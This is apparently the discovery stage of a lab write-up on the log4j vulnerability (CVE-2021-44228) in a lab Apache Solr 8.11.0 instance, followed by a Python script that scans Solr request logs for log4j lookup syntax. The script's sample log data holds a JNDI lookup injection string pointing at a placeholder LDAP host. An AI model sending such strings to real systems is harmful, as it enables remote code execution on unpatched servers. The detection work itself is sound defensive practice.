Discovery
This target machine is running Apache Solr 8.11.0, one example of software that is known to include this vulnerable log4j package.
I explored the web interface accessible at http://10.10.75.171:8983 and clicked around to get a feel for the application. For more detail on Apache Solr, please refer to their official website: https://solr.apache.org/
This instance of Apache Solr is provisioned with no data whatsoever. It is a flat, vanilla, and absolutely minimal installation -- yet at its core it is still vulnerable to CVE-2021-44228.
When navigating to http://10.10.75.171:8983, I could see clear indicators that log4j is in use within the application for logging activity. The -Dsolr.log.dir argument was set to /var/solr/logs.
The path/URL endpoint indicated in these repeated entries is /admin/cores.
I also gathered from these log entries that there are some data points I could control as a user. The params={} field gave that away.
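As an added example (not part of the original write-up), this Python sketch parses request-log lines of the kind described above and flags any user-supplied parameter carrying log4j lookup syntax, which is what a defender would search the files under /var/solr/logs for. The sample lines, their exact layout, the placeholder host name, and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on Solr request-log entries; the exact
# layout is an assumption and the host name is a placeholder.
SAMPLE_LOG = """\
2021-12-13 03:47:53.989 INFO  (qtp1-21) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={} status=0 QTime=0
2021-12-13 03:48:10.120 INFO  (qtp1-19) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json} status=0 QTime=1
2021-12-13 03:49:02.004 INFO  (qtp1-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=$%7Bjndi:ldap://host.invalid/a%7D} status=0 QTime=0
"""

# path= and params={...} are the fields the write-up calls out.
REQUEST_RE = re.compile(r"path=(?P<path>\S+) params=\{(?P<params>.*)\} status=\d+")


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so single- and double-encoded input look alike."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_requests(log_text):
    """Return (path, {name: value}) for every request-log line."""
    requests = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = {}
        for pair in match.group("params").split("&"):
            if pair:
                name, _, value = pair.partition("=")
                params[fully_decode(name)] = fully_decode(value)
        requests.append((match.group("path"), params))
    return requests


def find_lookups(log_text):
    """Flag user-controlled parameters that carry log4j lookup syntax (${...})."""
    return [(path, name, value)
            for path, params in parse_requests(log_text)
            for name, value in params.items()
            if "${" in name or "${" in value]


if __name__ == "__main__":
    for hit in find_lookups(SAMPLE_LOG):
        print("suspicious parameter:", hit)
```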